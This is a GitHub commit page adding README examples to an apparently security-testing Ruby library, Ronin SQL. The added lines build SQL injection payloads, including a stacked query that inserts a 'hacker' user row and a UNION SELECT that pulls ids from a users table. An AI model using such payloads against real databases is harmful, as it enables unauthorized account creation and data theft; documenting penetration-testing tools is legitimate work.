Permalink
Browse files

Differentiate between statements and sub-statements.

  • Loading branch information...
1 parent 71d58f0 commit b207b742218feb0861c414c2d1e2eb436ebf8133 @postmodern postmodern committed Jan 22, 2013
Showing with 8 additions and 0 deletions.
  1. +8 −0 README.md
View
@@ -74,6 +74,14 @@ Clauses:
Statements:
sqli = Ronin::SQL::Injection.new
+ sqli.and { 1 == 0 }
+ sqli.insert.into(:users).values('hacker','passw0rd','t')
+ puts sqli
+ # 1 AND 1=0; INSERT INTO users VALUES ('hacker','passw0rd','t')
+
+Sub-Statements:
+
+ sqli = Ronin::SQL::Injection.new
sqli.union { select(1,2,3,4,id).from(users) }
puts sqli
# 1 UNION SELECT (1,2,3,4,id) FROM users

0 comments on commit b207b74

Please sign in to comment.